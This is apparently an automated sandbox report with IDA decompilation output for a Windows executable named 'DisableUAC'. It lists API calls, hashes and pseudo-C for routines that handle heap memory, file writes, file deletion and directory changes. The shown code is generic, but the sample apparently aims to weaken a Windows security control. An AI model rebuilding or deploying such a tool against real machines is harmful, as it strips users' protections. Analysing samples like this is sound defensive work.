Part of subcall function 00000001400108A0: GetProcAddress.KERNEL32 ref: 00000001400108F1
Part of subcall function 00000001400108A0: GetLongPathNameA.KERNELBASE(?,?,?,0000000140003478,?,?,?,?,?,?,?,?,?,00000000,02370A20,0000000140005438), ref: 0000000140010905
Part of subcall function 00000001400108A0: FreeLibrary.KERNEL32 ref: 000000014001090C

Part of subcall function 00000001400145C0: HeapAlloc.KERNEL32 ref: 0000000140014603

GetTempFileNameA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000000014000514C), ref: 00000001400040AF

Part of subcall function 0000000140010630: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,0000000140001273), ref: 0000000140010672

Part of subcall function 00000001400145C0: HeapReAlloc.KERNEL32 ref: 0000000140014630

Part of subcall function 0000000140006CF0: memset.MSVCRT ref: 0000000140006D19

Part of subcall function 0000000140009E04: GetModuleFileNameA.KERNEL32 ref: 0000000140009E31
Part of subcall function 0000000140009E04: memmove.MSVCRT(?,?,?,0000000140002CD0,?,?,?,?,?,00000000,00000000,00000000,02370A20,0000000140004F6A), ref: 0000000140009E59

Part of subcall function 000000014000A0B8: SetEnvironmentVariableA.KERNEL32 ref: 000000014000A0D2

Part of subcall function 0000000140010B60: memmove.MSVCRT(?,?,?,0000000140004206), ref: 0000000140010B42

Part of subcall function 00000001400109F0: memmove.MSVCRT(?,?,?,0000000140004282), ref: 0000000140010A6C

Part of subcall function 0000000140014780: strlen.MSVCRT ref: 0000000140014796

PathAddBackslashA.SHLWAPI ref: 0000000140004339

Part of subcall function 0000000140014750: HeapFree.KERNEL32 ref: 000000014001476F

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: memmove$HeapNamePath$AllocFileFreeLibraryTemp$AddressBackslashEnvironmentLoadLongModuleProcVariablememsetstrlen
String ID:
API String ID: 3477932858-0
Opcode ID: 18244cac9bedf48c8ce92d24e3491487acd7261979a4e0a1d37f74d93d4c6489
Instruction ID: 098ed1370d781d9a28bf9768fea98fdd5f96251f16b27b1e3c5aac873637a50f
Opcode Fuzzy Hash: 18244cac9bedf48c8ce92d24e3491487acd7261979a4e0a1d37f74d93d4c6489
Instruction Fuzzy Hash: DB91CBBAA18958D5EB076FA7BC46BE93231B35D3D1F145025FB480B272EE3AC0959B10

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000490B Relevance: 3.2, APIs: 2, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140010FC0: CreateFileA.KERNEL32 ref: 000000014001101A
Part of subcall function 0000000140010FC0: CreateFileA.KERNEL32 ref: 000000014001104B
Part of subcall function 0000000140010FC0: HeapAlloc.KERNEL32 ref: 0000000140011076

GetCommandLineA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140005127), ref: 0000000140004980

Part of subcall function 0000000140010630: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,0000000140001273), ref: 0000000140010672

Part of subcall function 000000014000A0B8: SetEnvironmentVariableA.KERNEL32 ref: 000000014000A0D2

Part of subcall function 0000000140011400: WriteFile.KERNEL32 ref: 0000000140011480
Part of subcall function 0000000140011400: WriteFile.KERNEL32 ref: 00000001400114C6

Part of subcall function 00000001400145C0: HeapAlloc.KERNEL32 ref: 0000000140014603

RemoveDirectoryA.KERNEL32 ref: 0000000140004B9C

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: File$AllocCreateHeapWrite$CommandDirectoryEnvironmentLineRemoveVariablememmove
String ID:
API String ID: 1022564277-0
Opcode ID: 32238bec763847160ded3e6410547743ba466f39a10158d1ca3ca8aa6ad5a652
Instruction ID: 24d6b22a4e9be9c56a7c8586f38b206f1f3ab4da3636b81dd9d729639b65bedf
Opcode Fuzzy Hash: 32238bec763847160ded3e6410547743ba466f39a10158d1ca3ca8aa6ad5a652
Instruction Fuzzy Hash: 48613AB7A28A54D5EB036B67BC42BEA3671B35D7E4F141425FF480B272EE3AD0958700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140011400 Relevance: 3.1, APIs: 2, Instructions: 75
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E00000001140011400(void* __edx, void* __rax, void* __rcx, intOrPtr* __rdx, long long __rdi, long long _a8, char _a24, char _a32) {
				long long _v40;
				void* __rbx;
				void* __rsi;
				void* _t13;
				char _t16;
				void* _t24;
				void* _t32;
				void* _t33;
				intOrPtr _t35;
				long long _t51;
				void* _t54;

				_t32 = __rax;
				_t50 = __rdx;
				_t35 =  *0x4001da10; // 0x21a2e80
				_a24 = 0;
				_a32 = 0;
				E00000001140013664(_t13, _t35, __rcx);
				_t33 = _t32;
				if (_t32 == 0) goto 0x400114e0;
				if (__rdx == 0) goto 0x4001148b;
				if ( *__rdx == bpl) goto 0x4001148b;
				_a8 = __rdi;
				if ( *((intOrPtr*)(_t32 + 8)) == _t51) goto 0x40011468;
				asm("repne scasb");
				_t16 = E000000011400114F0(_t24, _t32, _t33, _t33, __rdx, __rdx, _t54); // executed
				_a24 = _t16;
				goto 0x40011486;
				_v40 = _t51;
				asm("repne scasb");
				WriteFile(??, ??, ??, ??, ??);
				r8d = 2;
				if ( *((intOrPtr*)(_t33 + 8)) == _t51) goto 0x400114b9;
				E000000011400114F0(_t24, _t32, _t33, _t33, "\r\n", _t50,  &_a24);
				return _t32;
			}

0x140011400
0x140011408
0x14001140e
0x140011417
0x14001141b
0x14001141f
0x140011424
0x14001142a
0x140011433
0x140011438
0x14001143e
0x14001144d
0x140011451
0x14001145d
0x140011462
0x140011466
0x14001146f
0x140011474
0x140011480
0x14001148b
0x14001149c
0x1400114a1
0x1400114b8

APIs

WriteFile.KERNEL32 ref: 0000000140011480

Part of subcall function 00000001400114F0: SetFilePointer.KERNEL32 ref: 0000000140011527
Part of subcall function 00000001400114F0: memmove.MSVCRT ref: 00000001400115C7

WriteFile.KERNEL32 ref: 00000001400114C6

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: File$Write$Pointermemmove
String ID:
API String ID: 3944725719-0
Opcode ID: c0cbd7b043c17b8b5cc5259ddc74681391ea0e54147d9349493f4d55c54d720a
Instruction ID: 07e37d6842a15590c041ad4f555a6cbf0d9bf149058d5390f5048dec0aade38d
Opcode Fuzzy Hash: c0cbd7b043c17b8b5cc5259ddc74681391ea0e54147d9349493f4d55c54d720a
Instruction Fuzzy Hash: 61217F7660578487E712CF66E8013EAB3A1F788BE4F484215BF594BBA9CF39D481C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000BB30 Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000BCB5
AddVectoredExceptionHandler.KERNEL32 ref: 000000014000BCD0

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: ExceptionHandlerVectored$Remove
String ID:
API String ID: 3670940754-0
Opcode ID: bc413e9457b24373b752fcba0a93c930584e0745702aba6031e395b40d37cad4
Instruction ID: acb284347be458eff30f62ce87e6265c4ad2481cd9c43306fe8805004b986ba3
Opcode Fuzzy Hash: bc413e9457b24373b752fcba0a93c930584e0745702aba6031e395b40d37cad4
Instruction Fuzzy Hash: E8F075B4605A04B1FE1B9B93B9947E472A4BB5C7E0F580026AF5A4B6B09F7D84948300

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001096C Relevance: 3.0, APIs: 2, Instructions: 19
fileCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0000000114001096C(void* __ebx, void* __ecx, void* __rax, long long __rbx, long long __rsi, long long _a8, long long _a16) {
				void* _t9;
				long _t11;
				void* _t12;
				void* _t14;
				void* _t26;
				long _t28;
				void* _t31;
				void* _t32;

				_t26 = __rax;
				goto 0x40010938;
				asm("int3");
				_a8 = __rbx;
				_a16 = __rsi;
				E00000001140014840(_t9, 0x104, __ecx, _t31);
				_t32 = _t26;
				_t11 = GetCurrentDirectoryA(??, ??);
				_t28 = _t11;
				if (_t11 == 0) goto 0x400109b3;
				if ( *((char*)(_t28 + _t32 - 1)) == 0x5c) goto 0x400109b3;
				 *((char*)(_t28 + _t32)) = 0x5c;
				_t14 = __ebx + 1;
				_t12 = E000000011400149E0(_t11, 0x104 - _t14);
				 *((char*)(_t14 + _t32)) = 0;
				return _t12;
			}

0x14001096c
0x14001096e
0x140010973
0x140010974
0x140010979
0x14001098c
0x140010996
0x140010999
0x14001099f
0x1400109a4
0x1400109ab
0x1400109ad
0x1400109b1
0x1400109b7
0x1400109c9
0x1400109d3

APIs

SetFileAttributesA.KERNEL32 ref: 0000000140010950
DeleteFileA.KERNEL32 ref: 0000000140010959

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: e34c9f279bb0ccb76e077c32b26df4dcbe9631fccf47b06d3e03def29e72fe80
Instruction ID: 924fdea830bd0562510ffb4e7ba56d5413f46a55016ef54455db7e0a37f37afc
Opcode Fuzzy Hash: e34c9f279bb0ccb76e077c32b26df4dcbe9631fccf47b06d3e03def29e72fe80
Instruction Fuzzy Hash: 39E05E35705511C2FBAB57A3A8763E702425F8C7D0F1C8020ABCA0F6B6DEBF44C98200

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140014440 Relevance: 3.0, APIs: 2, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 000000014001444E
HeapAlloc.KERNEL32 ref: 0000000140014481

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Heap$AllocCreate
String ID:
API String ID: 2618940340-0
Opcode ID: 7a6a208a07cc415ccf816c011b562f8a827e1e74348773d3d92292bfe05e2e8e
Instruction ID: 2642f1e1d51764857ae9b43a20663aab27af55f6c68d30ac6ee27bf5c3de1eb4
Opcode Fuzzy Hash: 7a6a208a07cc415ccf816c011b562f8a827e1e74348773d3d92292bfe05e2e8e
Instruction Fuzzy Hash: 63E01234240B6081F30ADB23EC2638533A0BB4C3C5F84002AEA4A4BB70CF3E80458301

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400144A0 Relevance: 3.0, APIs: 2, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00000001400144B4
HeapDestroy.KERNEL32 ref: 00000001400144C1

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Heap$DestroyFree
String ID:
API String ID: 2061148462-0
Opcode ID: 21331f7a9aadf9ed8591f779255ebbdb01b7f62e0c460166dbe891159f9ff201
Instruction ID: 9ffbc757bacf1f98737e75450edccebae2ebac97f80812808714150a88277cd8
Opcode Fuzzy Hash: 21331f7a9aadf9ed8591f779255ebbdb01b7f62e0c460166dbe891159f9ff201
Instruction Fuzzy Hash: 2ED0CA34A54810C2E606EB23EC943843320BF8CBCAFC40012EA0E4BA30CE3A80568306

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140013FEC Relevance: 2.6, APIs: 2, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00000001140013FEC(signed long long __rax, long long __rbx, signed long long __rcx, long long __rdx, long long __rsi, long long __rbp, long long __r9, long long _a8, long long _a16, long long _a24, long long* _a40) {
				void* _t20;
				signed long long _t29;
				long long _t46;
				signed long long _t57;
				long long* _t58;

				_t29 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t58 = _a40;
				_t57 = __rcx;
				r15d = r8d;
				_t46 = __rdx;
				E000000011400141AC(__rbx,  *_t58, __rdx);
				HeapAlloc(??, ??, ??); // executed
				if (_t29 == 0) goto 0x400140a3;
				 *(_t29 + 8) = _t57;
				 *((long long*)(_t29 + 0x20)) = _t46;
				 *((intOrPtr*)(_t29 + 0x28)) = r15d;
				 *((long long*)(_t29 + 0x10)) = __r9;
				 *((long long*)(_t29 + 0x18)) = _t58;
				 *_t29 = 1;
				memset(??, ??, ??);
				 *_t58 = _t29 + 0x30;
				E00000001140014A24(_t29, __r9);
				if (_t29 == 0) goto 0x400140a3;
				if (_t46 <= 0) goto 0x400140a3;
				_t20 = E00000001140014A8C(_t29 + 0x30 + _t29 * _t57, __r9);
				if (1 - _t46 < 0) goto 0x40014089;
				return _t20;
			}

0x140013fec
0x140013fec
0x140013ff1
0x140013ff6
0x140014008
0x14001400d
0x140014017
0x14001401a
0x14001401d
0x140014036
0x140014044
0x140014052
0x140014056
0x14001405a
0x14001405e
0x140014062
0x140014066
0x14001406c
0x140014074
0x140014078
0x140014080
0x140014085
0x140014094
0x1400140a1
0x1400140c2

APIs

Part of subcall function 00000001400141AC: HeapFree.KERNEL32 ref: 0000000140014205

HeapAlloc.KERNEL32 ref: 0000000140014036
memset.MSVCRT ref: 000000014001406C

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Heap$AllocFreememset
String ID:
API String ID: 3063399779-0
Opcode ID: 79f87f29f97e6dccc8367c80afa8e2cdaaf5bd1851c28db903cbb0f5b642548f
Instruction ID: 7c79f6b400878605d16e2c0b5b53b6599e83bfe8a9851b80ce70ee5c2be72a82
Opcode Fuzzy Hash: 79f87f29f97e6dccc8367c80afa8e2cdaaf5bd1851c28db903cbb0f5b642548f
Instruction Fuzzy Hash: BD214772600B5085EB06DF13B84079AB7A8FB8CBD0F998025AF9C4B766CE79C492C340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400145C0 Relevance: 2.5, APIs: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 0000000140014603
HeapReAlloc.KERNEL32 ref: 0000000140014630

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 2e7e0cf5510a8f855376ba8696431be7dc8d90c52abb43e91aa63d3104e51ea6
Instruction ID: 86c09aeec09d3e0c08409706a0da4de9526ad5e9d29a963ca27879ee0f6784d2
Opcode Fuzzy Hash: 2e7e0cf5510a8f855376ba8696431be7dc8d90c52abb43e91aa63d3104e51ea6
Instruction Fuzzy Hash: D0118076609A4486DB11CF1AE89136A77B0FBCDB94F514026EB8D87B38DF3EC5018A00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140010BC0 Relevance: 2.5, APIs: 2, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00000001140010BC0(void* __rax, void* __rcx, long long __rdi, long long _a48) {
				void* _t5;
				void* _t16;
				void* _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t25;

				_t16 = __rax;
				if (__rcx != 0xffffffff) goto 0x40010be0;
				_t20 =  *0x4001da10; // 0x21a2e80
				_pop(_t18);
				goto E00000001140013790;
				_t21 =  *0x4001da10; // 0x21a2e80
				_a48 = __rdi;
				E00000001140013664(_t5, _t21, _t20);
				if (_t16 == 0) goto 0x40010c36;
				if ( *((long long*)(_t16 + 8)) == 0) goto 0x40010c1e;
				E00000001140010B70(_t16, _t16); // executed
				HeapFree(??, ??, ??);
				CloseHandle(??);
				_t25 =  *0x4001da10; // 0x21a2e80
				return E00000001140013690(_t25, _t18);
			}

0x140010bc0
0x140010bcd
0x140010bcf
0x140010bda
0x140010bdb
0x140010be3
0x140010bea
0x140010bef
0x140010bfa
0x140010c01
0x140010c06
0x140010c18
0x140010c21
0x140010c27
0x140010c40

APIs

HeapFree.KERNEL32 ref: 0000000140010C18
CloseHandle.KERNEL32 ref: 0000000140010C21

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: 92b16db2d0d640760e5e3dc3ae48f06692e7d26871177727e17f30de7693d676
Instruction ID: bde007bdb5aebb66d2de83d98b5bd88681a0876cb422925cf986952be692e532
Opcode Fuzzy Hash: 92b16db2d0d640760e5e3dc3ae48f06692e7d26871177727e17f30de7693d676
Instruction Fuzzy Hash: 8A016DB421464480EA12D713E4943E57390AB8CBE4F088611BFAA0F7F5CF3AC490C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140006C60 Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00000001140006C60(void* __ebx, void* __edx, void* __eflags, signed char* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				void* _t10;
				void* _t11;
				signed int _t13;
				CHAR* _t14;
				void* _t16;
				void* _t21;
				signed char* _t27;
				signed char* _t30;
				void* _t37;
				signed char* _t40;

				_t27 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t21 = __edx;
				E000000011400062C0(__rcx, _t37);
				_t10 = E000000011400147F0(_t16, __edx, __rcx);
				_t11 = E00000001140014840(_t10, __ebx, _t21);
				_t30 = _t27;
				if (_t10 == 0) goto 0x40006ca5;
				E000000011400148F0(_t11, _t10);
				_t40 = _t27;
				if (_t40 == 0) goto 0x40006cc9;
				_t13 =  *_t40 & 0x000000ff;
				 *(_t30 - _t40 +  &(_t40[1]) - 1) = _t13;
				if (_t13 != 0) goto 0x40006cb0;
				_t14 = CharUpperA(??); // executed
				goto 0x40006ccc;
				 *_t30 = 0;
				return _t14;
			}

0x140006c60
0x140006c60
0x140006c65
0x140006c6a
0x140006c74
0x140006c79
0x140006c84
0x140006c8f
0x140006c94
0x140006c99
0x140006c9d
0x140006ca2
0x140006ca8
0x140006cb0
0x140006cb6
0x140006cbc
0x140006cc1
0x140006cc7
0x140006cc9
0x140006ce0

APIs

Part of subcall function 0000000140014840: HeapReAlloc.KERNEL32 ref: 00000001400148A7

CharUpperA.USER32 ref: 0000000140006CC1

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: AllocCharHeapUpper
String ID:
API String ID: 1404173643-0
Opcode ID: fbed815cdd551ee4470b1107e0a01341bf11c730adb8ba1fe83623bd9dc354f7
Instruction ID: 626fb0c78495cb5264c0e521ba7727841a2dfdd9dc56f79f82eaf191f8b3f661
Opcode Fuzzy Hash: fbed815cdd551ee4470b1107e0a01341bf11c730adb8ba1fe83623bd9dc354f7
Instruction Fuzzy Hash: E201A2717187D585FA16DF7770103AEA6919789BC0F188034BF8A1B7A7DE3AC8464340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140010B70 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000000140010B9D

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 2cb5f59a41e3b181bf41b86d442c365408aede3bccd2683afb5314e07551c5cc
Instruction ID: f03a1912405412e1d00cbd7bd198d8df709bd750e8ee205718eab73625293a83
Opcode Fuzzy Hash: 2cb5f59a41e3b181bf41b86d442c365408aede3bccd2683afb5314e07551c5cc
Instruction Fuzzy Hash: B0F03077624654CBCB10CF36E44126A73B0F349B89F244415EF8847724EB3AC952CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001BBD Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00000001140001BBD() {
				void* _t1;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_t1 = E0000000114000B9CC(_t8); // executed
				E0000000114000BE90(_t1); // executed
				E0000000114000C514(_t9);
				E0000000114000D824(_t9, _t10); // executed
				E0000000114000EC54(); // executed
				FreeLibrary(??);
				E00000001140010804();
				_t7 = E00000001140010C50(_t9, _t10); // executed
				0x40011cdc(); // executed
				0x40010520(); // executed
				return _t7;
			}

0x140001bc1
0x140001bc6
0x140001bcb
0x140001bd0
0x140001bd5
0x140001bda
0x140001bdf
0x140001be4
0x140001be9
0x140001bee
0x140001bf7

APIs

Part of subcall function 000000014000BE90: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000BEA0

Part of subcall function 000000014000C514: DestroyWindow.USER32 ref: 000000014000C52D

FreeLibrary.KERNELBASE ref: 0000000140001BDA

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: DestroyExceptionFreeHandlerLibraryRemoveVectoredWindow
String ID:
API String ID: 856319693-0
Opcode ID: 718c1fe1da3f41320eccb9e2dd6bdd258bb49cd6e36069a26bbc839740965058
Instruction ID: 5594ce0b4fa3f5167859fb3dbb8d349319302e97c57271f519b5948d215810c9
Opcode Fuzzy Hash: 718c1fe1da3f41320eccb9e2dd6bdd258bb49cd6e36069a26bbc839740965058
Instruction Fuzzy Hash: 31D0EAF9A5286248F94BB3FB38477CC04521F9C3C0F905111B3841B1F31DB6109919B3

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400109D4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32 ref: 00000001400109DD

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: e9319180f629fdf2efaa4fb6ba193446b6abf70a76bf57152689e362eb55f372
Instruction ID: 70f906db62295bb0b0d51b41f44f147f7bce4bb44862fbe85c724a9e2297097a
Opcode Fuzzy Hash: e9319180f629fdf2efaa4fb6ba193446b6abf70a76bf57152689e362eb55f372
Instruction Fuzzy Hash: 06C09224A17011C5FE5AA3A799633AD00902B0C391F944510AB464A1B28EAF18EB0641

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140010500 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON

